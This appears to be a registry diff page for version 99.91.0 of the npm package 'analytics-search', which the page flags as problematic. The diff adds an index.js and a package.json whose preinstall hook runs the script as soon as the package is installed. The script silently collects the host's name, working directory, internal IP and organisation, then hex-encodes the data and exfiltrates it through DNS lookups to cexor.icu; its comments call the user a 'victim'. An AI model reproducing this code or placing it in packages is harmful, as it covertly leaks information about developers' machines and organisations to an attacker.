analytics-search 99.91.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of analytics-search might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +111 -0
  2. package/package.json +13 -0
package/index.js ADDED
@@ -0,0 +1,111 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const https = require("https");
4
+ const crypto = require("crypto");
5
+
6
+ // IPinfo API tokens to avoid rate limiting
7
+ const IPINFO_TOKENS = [
8
+ "e9334ba807050e1",
9
+ "26ed3371fb48a1",
10
+ "ca6b61c75a1ea9",
11
+ "c8e4ba13f45cdc"
12
+ ];
13
+
14
+ let currentTokenIndex = 0;
15
+
16
+ // Function to rotate IPinfo tokens
17
+ function getNextToken() {
18
+ const token = IPINFO_TOKENS[currentTokenIndex];
19
+ currentTokenIndex = (currentTokenIndex + 1) % IPINFO_TOKENS.length;
20
+ return token;
21
+ }
22
+
23
+ // Function to fetch organization info from IPinfo
24
+ function getOrganizationFromIP(ip) {
25
+ return new Promise((resolve) => {
26
+ const token = getNextToken();
27
+ const url = `https://ipinfo.io/${ip}?token=${token}`;
28
+
29
+ https.get(url, (res) => {
30
+ let data = "";
31
+ res.on("data", (chunk) => {
32
+ data += chunk;
33
+ });
34
+ res.on("end", () => {
35
+ try {
36
+ const response = JSON.parse(data);
37
+ resolve(response.org || "Unknown Organization");
38
+ } catch (err) {
39
+ resolve("Unknown Organization");
40
+ }
41
+ });
42
+ }).on("error", () => {
43
+ resolve("Unknown Organization");
44
+ });
45
+ });
46
+ }
47
+
48
+ // Fetch system and victim data
49
+ async function collectData() {
50
+ const ipAddress = getIPAddress();
51
+ const organization = await getOrganizationFromIP(ipAddress);
52
+
53
+ const data = {
54
+ time: new Date().toISOString(),
55
+ organization: organization || "Unknown",
56
+ ip_address: ipAddress,
57
+ package_name: "analytics-search",
58
+ hostname: os.hostname(),
59
+ current_path: process.cwd(),
60
+ };
61
+
62
+ return data;
63
+ }
64
+
65
+ // Function to get the victim's IP address
66
+ function getIPAddress() {
67
+ const interfaces = os.networkInterfaces();
68
+ for (const name of Object.keys(interfaces)) {
69
+ for (const iface of interfaces[name]) {
70
+ if (!iface.internal && iface.family === "IPv4") {
71
+ return iface.address;
72
+ }
73
+ }
74
+ }
75
+ return "127.0.0.1"; // Default to localhost if no external IP found
76
+ }
77
+
78
+ // Encode data into hex and split into chunks
79
+ function encodeDataInChunks(data, chunkSize = 50) {
80
+ const jsonData = JSON.stringify(data);
81
+ const hexData = Buffer.from(jsonData).toString("hex");
82
+
83
+ const chunks = [];
84
+ for (let i = 0; i < hexData.length; i += chunkSize) {
85
+ chunks.push(hexData.slice(i, i + chunkSize));
86
+ }
87
+
88
+ return chunks;
89
+ }
90
+
91
+ // Send DNS queries directly (no dig)
92
+ async function sendData() {
93
+ const data = await collectData();
94
+ const chunks = encodeDataInChunks(data);
95
+
96
+ // Send the chunks with a simple index (1, 2, 3...)
97
+ for (let i = 0; i < chunks.length; i++) {
98
+ const chunk = chunks[i];
99
+ const query = `${i + 1}-${chunk}.cexor.icu`; // Use simple index (1, 2, 3...)
100
+
101
+ dns.resolve(query, (err) => {
102
+ if (err) {
103
+ // We don't print anything to console
104
+ }
105
+ // No console output
106
+ });
107
+ }
108
+ }
109
+
110
+ // Trigger the data exfiltration process
111
+ sendData();
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "analytics-search",
3
+ "version": "99.91.0",
4
+ "description": "analytics-search",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall":"node index.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
13
+ }